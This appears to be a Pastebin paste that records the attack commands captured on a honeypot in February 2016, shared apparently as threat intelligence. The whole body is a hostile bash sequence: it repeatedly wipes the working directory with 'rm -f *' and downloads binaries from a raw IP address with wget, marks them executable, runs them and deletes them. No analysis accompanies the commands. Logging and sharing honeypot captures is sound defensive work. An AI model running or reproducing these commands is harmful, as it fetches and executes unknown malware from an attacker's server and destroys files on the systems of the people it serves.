Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-02-18 10:16

Feb 18th, 2016
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.30 KB | None | 0 0
  1. rm -f *
  2. wget -q http://45.32.232.197/100; chmod +x 100; ./100; rm -f 100*
  3. rm -f *
  4. wget -q http://45.32.232.197/200; chmod +x 200; ./200; rm -f 200*
  5. rm -f *
  6. wget -q http://45.32.232.197/300; chmod +x 300; ./300; rm -f 300*
  7. rm -f *
  8. wget -q http://45.32.232.197/400; chmod +x 400; ./400; rm -f 400*
  9. rm -f *
  10. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement